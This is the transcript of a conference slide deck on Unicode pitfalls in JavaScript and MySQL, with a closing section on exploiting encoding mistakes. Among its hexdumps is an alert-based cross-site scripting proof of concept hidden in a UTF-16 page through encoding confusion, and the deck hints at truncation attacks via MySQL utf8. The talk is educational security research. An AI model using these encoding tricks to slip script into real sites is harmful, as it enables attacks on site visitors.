$30 off During Our Annual Pro Sale. View Details »

Hacking with Unicode

Hacking with Unicode

This presentation explores common mistakes made by programmers when dealing with Unicode support and character encodings on the Web. For each mistake, I explain how to fix/prevent it, but also how it could possibly be exploited.

Event: HackPra — the hacking lecture at the Ruhr University in Bochum
Video: https://www.youtube.com/watch?v=qFfjJ8pOrWY&hd=1 (use these slides though, not the ones in the video)
Links: http://lanyrd.com/2014/hackpra/sczxgz/

2016 update: https://speakerdeck.com/mathiasbynens/hacking-with-unicode-in-2016

Mathias Bynens

May 21, 2014
Tweet

More Decks by Mathias Bynens

Other Decks in Technology

Transcript

  1. @mathias · #hackpra
    Hacking with Unicode

    View Slide

  2. @mathias · #hackpra
    1337 unic0de h4xx

    View Slide

  3. @mathias

    View Slide

  4. 1. Unicode
    2. Encodings for Unicode
    3. Unicode in JavaScript
    4. Unicode in MySQL
    5. Hacking with Unicode
    What we’ll cover

    View Slide

  5. 1. Unicode

    View Slide

  6. code point unique name
    symbol/glyph

    View Slide

  7. A
    LATIN CAPITAL LETTER A
    U+0041

    View Slide

  8. a
    LATIN SMALL LETTER A
    U+0061

    View Slide

  9. ©
    COPYRIGHT SIGN
    U+00A9

    View Slide


  10. SNOWMAN
    U+2603

    View Slide

  11. PILE OF POO
    U+1F4A9
    !

    View Slide

  12. U+000000 → U+10FFFF

    View Slide

  13. (0x10FFFF + 1) code points
    !

    !
    17 planes
    (0xFFFF + 1) code points each

    View Slide

  14. Unicode plane #1
    U+0000 → U+FFFF
    Basic Multilingual Plane

    View Slide

  15. Unicode planes #2-17
    !
    U+010000 → U+10FFFF
    !
    supplementary planes
    astral planes

    View Slide

  16. 2. Encodings

    View Slide

  17. Code point range UTF-8 UTF-16 UTF-32 UTF-EBCDIC GB 18030
    U+000000 – U+00007F 1
    2
    4
    1
    1
    U+000080 – U+00009F
    2
    2 for characters
    inherited from!
    GB 2312/GBK
    (e.g. most!
    Chinese
    characters);!
    4 for!
    everything else
    U+0000A0 – U+0003FF 2
    U+000400 – U+0007FF
    3
    U+000800 – U+003FFF
    3
    U+004000 – U+00FFFF
    4
    U+010000 – U+03FFFF
    4 4 4
    U+040000 – U+10FFFF 5
    Number of bytes per code point

    View Slide

  18. Code point range UTF-8 UTF-16 UTF-32 UTF-EBCDIC GB 18030
    U+000000 – U+00007F 1
    2
    4
    1
    1
    U+000080 – U+00009F
    2
    2 for characters
    inherited from!
    GB 2312/GBK
    (e.g. most!
    Chinese
    characters);!
    4 for!
    everything else
    U+0000A0 – U+0003FF 2
    U+000400 – U+0007FF
    3
    U+000800 – U+003FFF
    3
    U+004000 – U+00FFFF
    4
    U+010000 – U+03FFFF
    4 4 4
    U+040000 – U+10FFFF 5
    Number of bytes per code point

    View Slide

  19. View Slide

  20. IETF RFCs

    View Slide

  21. IETF RFCs

    View Slide

  22. View Slide


  23. View Slide

  24. View Slide

  25. View Slide

  26. 3. JavaScript " Unicode
    http://mths.be/jsu

    View Slide

  27. View Slide

  28. View Slide

  29. JavaScript has a Unicode problem
    http://mths.be/jsu

    View Slide

  30. View Slide

  31. Hexadecimal escape sequences
    >> '\x41\x42\x43'
    'ABC'
    >> '\x61\x62\x63'
    'abc'
    can be used for U+0000 → U+00FF

    View Slide

  32. Unicode escape sequences
    >> '\u0041\u0042\u0043'
    'ABC'
    >> 'I \u2661 JavaScript!'
    'I ὑ JavaScript!'
    can be used for U+0000 → U+FFFF

    View Slide

  33. …what about astral
    code points?

    View Slide

  34. …what about !?
    *…and other, equally important astral symbols
    *

    View Slide

  35. !

    View Slide

  36. Unicode code point escapes
    >> '\u{41}\u{42}\u{43}'
    'ABC'
    >> '\u{1F4A9}'
    '!' // U+1F4A9
    !
    can be used for U+000000 → U+10FFFF
    ES6

    View Slide

  37. Surrogate pairs
    >> '\uD83D\uDCA9'
    '!' // U+1F4A9
    !
    can be used for U+010000 → U+10FFFF

    View Slide

  38. Surrogate pairs
    // for astral code points (> 0xFFFF)
    function getSurrogates(codePoint) {
    var high = Math.floor((codePoint - 0x10000) / 0x400) + 0xD800;
    var low = (codePoint - 0x10000) % 0x400 + 0xDC00;
    return [ high, low ];
    }
    !
    function getCodePoint(high, low) {
    var codePoint = (high - 0xD800) * 0x400 + low - 0xDC00 + 0x10000;
    return codePoint;
    }
    !
    >> getSurrogates(0x1F4A9); // U+1F4A9 is !
    [ 0xD83D, 0xDCA9 ]
    >> getCodePoint(0xD83D, 0xDCA9);
    0x1F4A9
    http://mths.be/bed

    View Slide

  39. JavaScript string length
    >> 'A'.length // U+0041
    1
    >> 'A' == '\u0041'
    true
    >> 'B'.length // U+0042
    1
    >> 'B' == '\u0042'
    true

    View Slide

  40. String length ≠ char count
    >> '!'.length // U+1D400
    2
    >> '!' == '\uD835\uDC00'
    true
    >> '"'.length // U+1D401
    2
    >> '"' == '\uD835\uDC01'
    true

    View Slide

  41. String length ≠ char count
    >> '!'.length // U+1F4A9
    2
    >> '!' == '\uD83D\uDCA9'
    true
    insert obligatory
    “number two” joke here

    View Slide

  42. Real-world example

    View Slide

  43. Real-world example

    View Slide

  44. View Slide

  45. View Slide

  46. String character count
    function countSymbols(string) {
    return punycode.ucs2.decode(string).length;
    }
    !
    >> countSymbols('A') // U+0041
    1
    >> countSymbols('!') // U+1D400
    1
    >> countSymbols('!') // U+1F4A9
    1
    http://mths.be/punycode

    View Slide

  47. String character count
    function countSymbols(string) {
    return Array.from(string).length;
    }
    !
    >> countSymbols('A') // U+0041
    1
    >> countSymbols('!') // U+1D400
    1
    >> countSymbols('!') // U+1F4A9
    1
    ES6

    View Slide

  48. JavaScript escape sequences
    http://mths.be/bmf

    View Slide

  49. If we’re being pedantic…
    // it’s actually even more complicated:
    !
    >> 'mañana' == 'mañana'
    false

    View Slide

  50. If we’re being pedantic…
    // it’s actually even more complicated:
    !
    >> 'mañana' == 'mañana'
    false
    >> 'ma\xF1ana' == 'man\u0303ana'
    false
    >> 'ma\xF1ana'.length
    6
    >> 'man\u0303ana'.length
    7

    View Slide

  51. function countSymbolsPedantically(string) {
    // Unicode Normalization, NFC form:
    var normalized = string.normalize('NFC');
    // Account for astral symbols / surrogates:
    return Array.from(normalized).length;
    }
    !
    >> countSymbolsPedantically('mañana') // U+00F1
    6
    >> countSymbolsPedantically('mañana') // U+006E + U+0303
    6
    Unicode normalization
    http://git.io/unorm
    ES6

    View Slide

  52. Perfect?
    >> var zalgo = 'H
    ̹̙̦̮͉̩̗̗
    ͧ̇̏̊̾
    Eͨ͆͒̆ͮ̃
    ͏̷̮̣̫̤̣ ̵̞̹̻
    ̀̉̓ͬ͑͡
    ͅ
    Cͯ̂͐
    ͏̨̛͔̦̟͈̻
    O
    ̜͎͍͙͚̬̝̣
    ̽ͮ͐͗̀ͤ̍̀
    ͢
    M
    ̴̡̲̭͍͇̼̟̯̦
    ̉̒͠
    Ḛ̛̙̞̪̗
    ͥ
    ͤͩ̾͑̔͐
    ͅ
    Ṯ̴̷̷̗̼͍
    ̿̿̓̽͐
    H
    ̙̙
    ̔̄
    ͜
    ';

    View Slide

  53. Perfect? Nope.
    → can be ‘fixed’ using epic regex-fu
    >> var zalgo = 'H
    ̹̙̦̮͉̩̗̗
    ͧ̇̏̊̾
    Eͨ͆͒̆ͮ̃
    ͏̷̮̣̫̤̣ ̵̞̹̻
    ̀̉̓ͬ͑͡
    ͅ
    Cͯ̂͐
    ͏̨̛͔̦̟͈̻
    O
    ̜͎͍͙͚̬̝̣
    ̽ͮ͐͗̀ͤ̍̀
    ͢
    M
    ̴̡̲̭͍͇̼̟̯̦
    ̉̒͠
    Ḛ̛̙̞̪̗
    ͥ
    ͤͩ̾͑̔͐
    ͅ
    Ṯ̴̷̷̗̼͍
    ̿̿̓̽͐
    H
    ̙̙
    ̔̄
    ͜
    ';
    !
    >> countSymbolsPedantically(zalgo)
    116 // not 9

    View Slide

  54. Reversing a string in JavaScript
    // naive solution
    function reverse(string) {
    return string.split('').reverse().join('');
    }

    View Slide

  55. Reversing a string in JavaScript
    // naive solution
    function reverse(string) {
    return string.split('').reverse().join('');
    }
    !
    >> reverse('abc')
    'cba'

    View Slide

  56. Reversing a string in JavaScript
    // naive solution
    function reverse(string) {
    return string.split('').reverse().join('');
    }
    !
    >> reverse('abc')
    'cba'
    >> reverse('mañana') // U+00F1
    'anañam'

    View Slide

  57. Reversing a string in JavaScript
    // naive solution
    function reverse(string) {
    return string.split('').reverse().join('');
    }
    !
    >> reverse('abc')
    'cba'
    >> reverse('mañana') // U+00F1
    'anañam'
    >> reverse('mañana') // U+006E + U+0303
    'anãnam'

    View Slide

  58. Reversing a string in JavaScript
    // naive solution
    function reverse(string) {
    return string.split('').reverse().join('');
    }
    !
    >> reverse('abc')
    'cba'
    >> reverse('mañana') // U+00F1
    'anañam'
    >> reverse('mañana') // U+006E + U+0303
    'anãnam'
    >> reverse('!') // U+1F4A9
    '��'
    '\uDCA9\uD83D' // the surrogate pair for !, in the wrong order

    View Slide

  59. “I put my thang down,
    flip it, and reverse it”
    — Missy ‘Misdemeanor’ Elliot, 2002

    View Slide

  60. Reversing a string in JavaScript
    // Using the Esrever library
    var reverse = esrever.reverse;
    !
    >> reverse('abc')
    'cba'
    >> reverse('mañana') // U+00F1
    'anañam'
    >> reverse('mañana') // U+006E + U+0303
    'anañam'
    >> reverse('!') // U+1F4A9
    '!'
    http://mths.be/esrever

    View Slide

  61. This behavior affects
    other string methods, too.

    View Slide

  62. String.fromCharCode()
    >> String.fromCharCode(0x0041) // U+0041
    'A' // U+0041
    >> String.fromCharCode(0x1F4A9) // U+1F4A9
    '!' // U+F4A9
    !
    only works as you’d expect for
    U+0000 → U+FFFF

    View Slide

  63. String.fromCharCode()
    → use surrogate pairs for astral symbols:
    !
    >> String.fromCharCode(0xD83D, 0xDCA9)
    '!' // U+1F4A9
    !
    → or just use Punycode.js:
    !
    >> punycode.ucs2.encode([ 0x1F4A9 ])
    '!' // U+1F4A9

    View Slide

  64. String.fromCodePoint()
    >> String.fromCodePoint(0x1F4A9)
    '!'
    !
    can be used for U+000000 → U+10FFFF
    ES6
    http://mths.be/fromcodepoint

    View Slide

  65. String#charAt()
    >> '!'.charAt(0) // U+1F4A9
    '\uD83D' // U+D83D

    View Slide

  66. String#at()
    >> '!'.at(0) // U+1F4A9
    '!' // U+1F4A9
    ES7
    http://mths.be/at

    View Slide

  67. String#charCodeAt()
    >> '!'.charCodeAt(0) // U+1F4A9
    0xD83D

    View Slide

  68. String#codePointAt()
    >> '!'.codePointAt(0) // U+1F4A9
    0x1F4A9
    ES6
    http://mths.be/codepointat

    View Slide

  69. Iterate over all symbols in a string
    function getSymbols(string) {
    var length = string.length;
    var index = -1;
    var output = [];
    var character;
    var charCode;
    while (++index < length) {
    character = string.charAt(index);
    charCode = character.charCodeAt(0);
    if (charCode >= 0xD800 && charCode <= 0xDBFF) {
    // note: this doesn’t account for lone high surrogates
    output.push(character + string.charAt(++index));
    } else {
    output.push(character);
    }
    }
    return output;
    }
    !
    var symbols = getSymbols('! ');
    symbols.forEach(function(symbol) {
    assert(symbol == '! ');
    });

    View Slide

  70. Iterate over all symbols in a string
    for (let symbol of '!') {
    assert(symbol == '!');
    }
    ES6

    View Slide

  71. More string madness
    •String#substring
    •String#slice
    •…anything that involves strings

    View Slide

  72. Regular expressions
    >> /foo.bar/.test('foo!bar')
    false

    View Slide

  73. Match any Unicode symbol
    >> /^.$/.test('!')
    false // doesn’t match line breaks, either

    View Slide

  74. Match any Unicode symbol
    >> /^.$/.test('!')
    false // doesn’t match line breaks, either
    !
    >> /^[\s\S]$/.test('!')
    false // matches line breaks, but still doesn’t match whole
    astral symbols

    View Slide

  75. Match any Unicode symbol
    >> /^.$/.test('!')
    false // doesn’t match line breaks, either
    !
    >> /^[\s\S]$/.test('!')
    false // matches line breaks, but still doesn’t match whole
    astral symbols
    !
    >> /^[\0-\uD7FF\uDC00-\uFFFF]|[\uD800-
    \uDBFF][\uDC00-\uDFFF]|[\uD800-\uDBFF]
    $/.test('!')
    true // wtf

    View Slide

  76. Create Unicode-aware regular expressions
    >> regenerate().addRange(0x0, 0x10FFFF).toString()
    http://mths.be/regenerate

    View Slide

  77. Create Unicode-aware regular expressions
    >> regenerate().addRange(0x0, 0x10FFFF).toString()
    '[\0-\uD7FF\uDC00-\uFFFF]|[\uD800-\uDBFF][\uDC00-\uDFFF]|[\uD800-
    \uDBFF]'
    http://mths.be/regenerate

    View Slide

  78. >> regenerate().addRange(0x0, 0x10FFFF).toString()
    '[\0-\uD7FF\uDC00-\uFFFF]|[\uD800-\uDBFF][\uDC00-\uDFFF]|[\uD800-
    \uDBFF]'
    >> regenerate()
    http://mths.be/regenerate
    Create Unicode-aware regular expressions

    View Slide

  79. >> regenerate().addRange(0x0, 0x10FFFF).toString()
    '[\0-\uD7FF\uDC00-\uFFFF]|[\uD800-\uDBFF][\uDC00-\uDFFF]|[\uD800-
    \uDBFF]'
    >> regenerate()
    …… .addRange(0x000000, 0x10FFFF) // add all Unicode code points
    http://mths.be/regenerate
    Create Unicode-aware regular expressions

    View Slide

  80. >> regenerate().addRange(0x0, 0x10FFFF).toString()
    '[\0-\uD7FF\uDC00-\uFFFF]|[\uD800-\uDBFF][\uDC00-\uDFFF]|[\uD800-
    \uDBFF]'
    >> regenerate()
    …… .addRange(0x000000, 0x10FFFF) // add all Unicode code points
    …… .removeRange('A', 'z') // remove all symbols from `A` to `z`
    http://mths.be/regenerate
    Create Unicode-aware regular expressions

    View Slide

  81. >> regenerate().addRange(0x0, 0x10FFFF).toString()
    '[\0-\uD7FF\uDC00-\uFFFF]|[\uD800-\uDBFF][\uDC00-\uDFFF]|[\uD800-
    \uDBFF]'
    >> regenerate()
    …… .addRange(0x000000, 0x10FFFF) // add all Unicode code points
    …… .removeRange('A', 'z') // remove all symbols from `A` to `z`
    …… .remove('!') // remove U+1F4A9 PILE OF POO
    http://mths.be/regenerate
    Create Unicode-aware regular expressions

    View Slide

  82. >> regenerate().addRange(0x0, 0x10FFFF).toString()
    '[\0-\uD7FF\uDC00-\uFFFF]|[\uD800-\uDBFF][\uDC00-\uDFFF]|[\uD800-
    \uDBFF]'
    >> regenerate()
    …… .addRange(0x000000, 0x10FFFF) // add all Unicode code points
    …… .removeRange('A', 'z') // remove all symbols from `A` to `z`
    …… .remove('!') // remove U+1F4A9 PILE OF POO
    …… .toString();
    http://mths.be/regenerate
    Create Unicode-aware regular expressions

    View Slide

  83. >> regenerate().addRange(0x0, 0x10FFFF).toString()
    '[\0-\uD7FF\uDC00-\uFFFF]|[\uD800-\uDBFF][\uDC00-\uDFFF]|[\uD800-
    \uDBFF]'
    >> regenerate()
    …… .addRange(0x000000, 0x10FFFF) // add all Unicode code points
    …… .removeRange('A', 'z') // remove all symbols from `A` to `z`
    …… .remove('!') // remove U+1F4A9 PILE OF POO
    …… .toString();
    '[\0-\x1F\x21-\x40\x7B-\uD7FF\uDC00-\uFFFF]|[\uD800-\uDBFF][\uDC00-
    \uDFFF]|[\uD800-\uDBFF]'
    http://mths.be/regenerate
    Create Unicode-aware regular expressions

    View Slide

  84. >> var regenerate = require('regenerate');
    >> var symbols = require('unicode-7.0.0/scripts/Greek/symbols');
    >> var set = regenerate(symbols);
    >> set.toString();
    http://mths.be/regenerate
    Create Unicode-aware regular expressions
    http://mths.be/node-unicode-data

    View Slide

  85. >> var regenerate = require('regenerate');
    >> var symbols = require('unicode-7.0.0/scripts/Greek/symbols');
    >> var set = regenerate(symbols);
    >> set.toString();
    '[\u0370-\u0373\u0375-\u0377\u037A-\u037D\u037F\u0384\u0386\u0388-
    \u038A\u038C\u038E-\u03A1\u03A3-\u03E1\u03F0-\u03FF\u1D26-\u1D2A
    \u1D5D-\u1D61\u1D66-\u1D6A\u1DBF\u1F00-\u1F15\u1F18-\u1F1D\u1F20-
    \u1F45\u1F48-\u1F4D\u1F50-\u1F57\u1F59\u1F5B\u1F5D\u1F5F-\u1F7D
    \u1F80-\u1FB4\u1FB6-\u1FC4\u1FC6-\u1FD3\u1FD6-\u1FDB\u1FDD-\u1FEF
    \u1FF2-\u1FF4\u1FF6-\u1FFE\u2126\uAB65]|\uD800[\uDD40-\uDD8C\uDDA0]|
    \uD834[\uDE00-\uDE45]'
    http://mths.be/regenerate
    Create Unicode-aware regular expressions
    http://mths.be/node-unicode-data

    View Slide

  86. Regular expressions
    >> /foo.bar/.test('foo!bar')
    false
    !
    >> /foo.bar/u.test('foo!bar')
    true
    ES6

    View Slide

  87. Regex character classes
    >> /[a-c]/
    // matches:
    // U+0061 LATIN SMALL LETTER A
    // U+0062 LATIN SMALL LETTER B
    // U+0063 LATIN SMALL LETTER C
    >> /^[a-c]$/.test('a')
    true
    >> /^[a-c]$/.test('b')
    true
    >> /^[a-c]$/.test('c')
    true

    View Slide

  88. >> /[!-"]/
    // matches:
    // U+1F4A9 PILE OF POO
    // U+1F4AA FLEXED BICEPS
    // U+1F4AB DIZZY SYMBOL
    >> /^[!-"]$/.test('!')
    true
    >> /^[!-"]$/.test('#')
    true
    >> /^[!-"]$/.test('"')
    true
    Regex character classes

    View Slide

  89. >> /[!-"]/
    // matches:
    // U+1F4A9 PILE OF POO
    // U+1F4AA FLEXED BICEPS
    // U+1F4AB DIZZY SYMBOL
    >> /^[!-"]$/.test('!')
    true
    >> /^[!-"]$/.test('#')
    true
    >> /^[!-"]$/.test('"')
    true
    Regex character classes

    View Slide

  90. Regex character classes
    >> /[!-"]/
    SyntaxError: Invalid regular expression:
    Range out of order in character class

    View Slide

  91. Regex character classes
    >> /[!-"]/
    SyntaxError: Invalid regular expression:
    Range out of order in character class
    >> /[\uD83D\uDCA9-\uD83D\uDCAB]/

    View Slide

  92. Regex character classes
    >> /[!-"]/
    SyntaxError: Invalid regular expression:
    Range out of order in character class
    >> /[\uD83D\uDCA9-\uD83D\uDCAB]/

    View Slide

  93. Regex character classes
    ES6

    >> /[!-"]/u
    // matches:
    // U+1F4A9 PILE OF POO
    // U+1F4AA FLEXED BICEPS
    // U+1F4AB DIZZY SYMBOL
    >> /^[!-"]$/u.test('!')
    true
    >> /^[!-"]$/u.test('#')
    true
    >> /^[!-"]$/u.test('"')
    true

    View Slide

  94. >> regenerate().addRange('!', '"').toString()
    '\uD83D[\uDCA9-\uDCAB]'
    >> /^\uD83D[\uDCA9-\uDCAB]$/.test('!')
    true
    >> /^\uD83D[\uDCA9-\uDCAB]$/.test('#')
    true
    >> /^\uD83D[\uDCA9-\uDCAB]$/.test('"')
    true
    Regex character classes
    http://mths.be/regenerate

    View Slide

  95. JavaScript has a Unicode problem
    http://mths.be/jsu

    View Slide

  96. !
    The Pile of Poo Test™
    http://mths.be/jsu

    View Slide

  97. ! is the new %00

    View Slide

  98. 4. MySQL $ Unicode

    View Slide

  99. CREATE TABLE `table_name` (
    `id` INT(11) UNSIGNED NOT NULL AUTO_INCREMENT,
    `column_name` VARCHAR(255) NOT NULL DEFAULT '',
    PRIMARY KEY (`id`)
    ) ENGINE=InnoDB DEFAULT CHARSET=utf8;

    View Slide

  100. CREATE TABLE `table_name` (
    `id` INT(11) UNSIGNED NOT NULL AUTO_INCREMENT,
    `column_name` VARCHAR(255) NOT NULL DEFAULT '',
    PRIMARY KEY (`id`)
    ) ENGINE=InnoDB DEFAULT CHARSET=utf8;

    View Slide

  101. mysql> UPDATE table_name SET column_name = 'foo!bar' WHERE id = 9001;
    Query OK, 1 row affected, 1 warning (0.00 sec)
    Rows matched: 1 Changed: 1 Warnings: 1
    !
    mysql> SHOW WARNINGS;
    +---------+------+--------------------------------------------+
    | Level | Code | Message |
    +---------+------+--------------------------------------------+
    | Warning | 1366 | Incorrect string value: '\xF0\x9F\x92\xA9' |
    | | | for column 'column_name' at row 1 |
    +---------+------+--------------------------------------------+
    1 row in set (0.00 sec)
    !
    mysql> SELECT column_name FROM table_name WHERE id = 9001;
    +-------------+
    | column_name |
    +-------------+
    | foo |
    +-------------+
    1 row in set (0.00 sec)

    View Slide

  102. mysql> UPDATE table_name SET column_name = 'foo!bar' WHERE id = 9001;
    Query OK, 1 row affected, 1 warning (0.00 sec)
    Rows matched: 1 Changed: 1 Warnings: 1
    !
    mysql> SHOW WARNINGS;
    +---------+------+--------------------------------------------+
    | Level | Code | Message |
    +---------+------+--------------------------------------------+
    | Warning | 1366 | Incorrect string value: '\xF0\x9F\x92\xA9' |
    | | | for column 'column_name' at row 1 |
    +---------+------+--------------------------------------------+
    1 row in set (0.00 sec)
    !
    mysql> SELECT column_name FROM table_name WHERE id = 9001;
    +-------------+
    | column_name |
    +-------------+
    | foo |
    +-------------+
    1 row in set (0.00 sec)

    View Slide

  103. mysql> UPDATE table_name SET column_name = 'foo!bar' WHERE id = 9001;
    Query OK, 1 row affected, 1 warning (0.00 sec)
    Rows matched: 1 Changed: 1 Warnings: 1
    !
    mysql> SHOW WARNINGS;
    +---------+------+--------------------------------------------+
    | Level | Code | Message |
    +---------+------+--------------------------------------------+
    | Warning | 1366 | Incorrect string value: '\xF0\x9F\x92\xA9' |
    | | | for column 'column_name' at row 1 |
    +---------+------+--------------------------------------------+
    1 row in set (0.00 sec)
    !
    mysql> SELECT column_name FROM table_name WHERE id = 9001;
    +-------------+
    | column_name |
    +-------------+
    | foo |
    +-------------+
    1 row in set (0.00 sec)

    View Slide

  104. mysql> UPDATE table_name SET column_name = 'foo!bar' WHERE id = 9001;
    Query OK, 1 row affected, 1 warning (0.00 sec)
    Rows matched: 1 Changed: 1 Warnings: 1
    !
    mysql> SHOW WARNINGS;
    +---------+------+--------------------------------------------+
    | Level | Code | Message |
    +---------+------+--------------------------------------------+
    | Warning | 1366 | Incorrect string value: '\xF0\x9F\x92\xA9' |
    | | | for column 'column_name' at row 1 |
    +---------+------+--------------------------------------------+
    1 row in set (0.00 sec)
    !
    mysql> SELECT column_name FROM table_name WHERE id = 9001;
    +-------------+
    | column_name |
    +-------------+
    | foo |
    +-------------+
    1 row in set (0.00 sec)

    View Slide

  105. mysql> UPDATE table_name SET column_name = 'foo!bar' WHERE id = 9001;
    Query OK, 1 row affected, 1 warning (0.00 sec)
    Rows matched: 1 Changed: 1 Warnings: 1
    !
    mysql> SHOW WARNINGS;
    +---------+------+--------------------------------------------+
    | Level | Code | Message |
    +---------+------+--------------------------------------------+
    | Warning | 1366 | Incorrect string value: '\xF0\x9F\x92\xA9' |
    | | | for column 'column_name' at row 1 |
    +---------+------+--------------------------------------------+
    1 row in set (0.00 sec)
    !
    mysql> SELECT column_name FROM table_name WHERE id = 9001;
    +-------------+
    | column_name |
    +-------------+
    | foo |
    +-------------+
    1 row in set (0.00 sec)

    View Slide

  106. MySQL’s ✌️utf8✌️

    View Slide

  107. MySQL’s ✌️utf8✌️

    View Slide

  108. ALTER TABLE `table_name`
    CONVERT TO CHARACTER SET utf8mb4
    COLLATE utf8mb4_unicode_ci;
    http://mths.be/utf8mb4

    View Slide

  109. ALTER TABLE `table_name`
    CONVERT TO CHARACTER SET utf8mb4
    COLLATE utf8mb4_unicode_ci;
    http://mths.be/utf8mb4

    View Slide

  110. mysql> UPDATE table_name SET column_name = 'foo!bar' WHERE id = 9001;
    Query OK, 1 row affected (0.00 sec)
    Rows matched: 1 Changed: 1 Warnings: 0
    !
    mysql> SELECT column_name FROM table_name WHERE id = 9001;
    +-------------+
    | column_name |
    +-------------+
    | foo!bar |
    +-------------+
    1 row in set (0.00 sec)
    http://mths.be/utf8mb4

    View Slide

  111. mysql> UPDATE table_name SET column_name = 'foo!bar' WHERE id = 9001;
    Query OK, 1 row affected (0.00 sec)
    Rows matched: 1 Changed: 1 Warnings: 0
    !
    mysql> SELECT column_name FROM table_name WHERE id = 9001;
    +-------------+
    | column_name |
    +-------------+
    | foo!bar |
    +-------------+
    1 row in set (0.00 sec)
    http://mths.be/utf8mb4

    View Slide

  112. mysql> UPDATE table_name SET column_name = 'foo!bar' WHERE id = 9001;
    Query OK, 1 row affected (0.00 sec)
    Rows matched: 1 Changed: 1 Warnings: 0
    !
    mysql> SELECT column_name FROM table_name WHERE id = 9001;
    +-------------+
    | column_name |
    +-------------+
    | foo!bar |
    +-------------+
    1 row in set (0.00 sec)
    http://mths.be/utf8mb4

    View Slide

  113. mysql> UPDATE table_name SET column_name = 'foo!bar' WHERE id = 9001;
    Query OK, 1 row affected (0.00 sec)
    Rows matched: 1 Changed: 1 Warnings: 0
    !
    mysql> SELECT column_name FROM table_name WHERE id = 9001;
    +-------------+
    | column_name |
    +-------------+
    | foo!bar |
    +-------------+
    1 row in set (0.00 sec)
    http://mths.be/utf8mb4

    View Slide

  114. 5. Hacking with Unicode

    View Slide

  115. http://mths.be/brk

    View Slide

  116. $ curl -sL http://mths.be/brk | hexdump -C | tail -n 19
    000002c0 3c 00 70 00 3e 00 48 00 65 00 72 00 65 00 20 00 |<.p.>.H.e.r.e. .|
    000002d0 69 00 73 00 20 00 73 00 6f 00 6d 00 65 00 20 00 |i.s. .s.o.m.e. .|
    000002e0 6d 00 6f 00 6a 00 69 00 62 00 61 00 6b 00 65 00 |m.o.j.i.b.a.k.e.|
    000002f0 2e 00 20 00 54 00 6f 00 20 00 66 00 69 00 78 00 |.. .T.o. .f.i.x.|
    00000300 20 00 69 00 74 00 2c 00 20 00 75 00 73 00 65 00 | .i.t.,. .u.s.e.|
    00000310 20 00 74 00 68 00 65 00 20 00 63 00 68 00 61 00 | .t.h.e. .c.h.a.|
    00000320 72 00 61 00 63 00 74 00 65 00 72 00 20 00 65 00 |r.a.c.t.e.r. .e.|
    00000330 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 20 00 |n.c.o.d.i.n.g. .|
    00000340 6d 00 65 00 6e 00 75 00 20 00 74 00 6f 00 20 00 |m.e.n.u. .t.o. .|
    00000350 63 00 68 00 6f 00 6f 00 73 00 65 00 20 00 61 00 |c.h.o.o.s.e. .a.|
    00000360 6e 00 6f 00 74 00 68 00 65 00 72 00 20 00 65 00 |n.o.t.h.e.r. .e.|
    00000370 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 2e 00 |n.c.o.d.i.n.g...|
    00000380 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 70 00 |<./.p.>.....<.p.|
    00000390 3e 00 3c 73 63 72 69 70 74 3e 20 61 6c 65 72 74 |>. alert|<br/>000003a0 28 22 58 53 53 22 29 3b 3c 2f 73 63 72 69 70 74 |("XSS");000003b0 3e 20 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 |> <./.p.>.....<.|
    000003c0 2f 00 62 00 6f 00 64 00 79 00 3e 00 0a 00 3c 00 |/.b.o.d.y.>...<.|
    000003d0 2f 00 68 00 74 00 6d 00 6c 00 3e 00 0a 00 0a 00 |/.h.t.m.l.>.....|
    000003e0

    View Slide

  117. $ curl -sL http://mths.be/brk | hexdump -C | tail -n 19
    000002c0 3c 00 70 00 3e 00 48 00 65 00 72 00 65 00 20 00 |<.p.>.H.e.r.e. .|
    000002d0 69 00 73 00 20 00 73 00 6f 00 6d 00 65 00 20 00 |i.s. .s.o.m.e. .|
    000002e0 6d 00 6f 00 6a 00 69 00 62 00 61 00 6b 00 65 00 |m.o.j.i.b.a.k.e.|
    000002f0 2e 00 20 00 54 00 6f 00 20 00 66 00 69 00 78 00 |.. .T.o. .f.i.x.|
    00000300 20 00 69 00 74 00 2c 00 20 00 75 00 73 00 65 00 | .i.t.,. .u.s.e.|
    00000310 20 00 74 00 68 00 65 00 20 00 63 00 68 00 61 00 | .t.h.e. .c.h.a.|
    00000320 72 00 61 00 63 00 74 00 65 00 72 00 20 00 65 00 |r.a.c.t.e.r. .e.|
    00000330 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 20 00 |n.c.o.d.i.n.g. .|
    00000340 6d 00 65 00 6e 00 75 00 20 00 74 00 6f 00 20 00 |m.e.n.u. .t.o. .|
    00000350 63 00 68 00 6f 00 6f 00 73 00 65 00 20 00 61 00 |c.h.o.o.s.e. .a.|
    00000360 6e 00 6f 00 74 00 68 00 65 00 72 00 20 00 65 00 |n.o.t.h.e.r. .e.|
    00000370 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 2e 00 |n.c.o.d.i.n.g...|
    00000380 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 70 00 |<./.p.>.....<.p.|
    00000390 3e 00 3c 73 63 72 69 70 74 3e 20 61 6c 65 72 74 |>. alert|<br/>000003a0 28 22 58 53 53 22 29 3b 3c 2f 73 63 72 69 70 74 |("XSS");000003b0 3e 20 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 |> <./.p.>.....<.|
    000003c0 2f 00 62 00 6f 00 64 00 79 00 3e 00 0a 00 3c 00 |/.b.o.d.y.>...<.|
    000003d0 2f 00 68 00 74 00 6d 00 6c 00 3e 00 0a 00 0a 00 |/.h.t.m.l.>.....|
    000003e0

    View Slide

  118. $ curl -sL http://mths.be/brk | hexdump -C | tail -n 19
    000002c0 3c 00 70 00 3e 00 48 00 65 00 72 00 65 00 20 00 |<.p.>.H.e.r.e. .|
    000002d0 69 00 73 00 20 00 73 00 6f 00 6d 00 65 00 20 00 |i.s. .s.o.m.e. .|
    000002e0 6d 00 6f 00 6a 00 69 00 62 00 61 00 6b 00 65 00 |m.o.j.i.b.a.k.e.|
    000002f0 2e 00 20 00 54 00 6f 00 20 00 66 00 69 00 78 00 |.. .T.o. .f.i.x.|
    00000300 20 00 69 00 74 00 2c 00 20 00 75 00 73 00 65 00 | .i.t.,. .u.s.e.|
    00000310 20 00 74 00 68 00 65 00 20 00 63 00 68 00 61 00 | .t.h.e. .c.h.a.|
    00000320 72 00 61 00 63 00 74 00 65 00 72 00 20 00 65 00 |r.a.c.t.e.r. .e.|
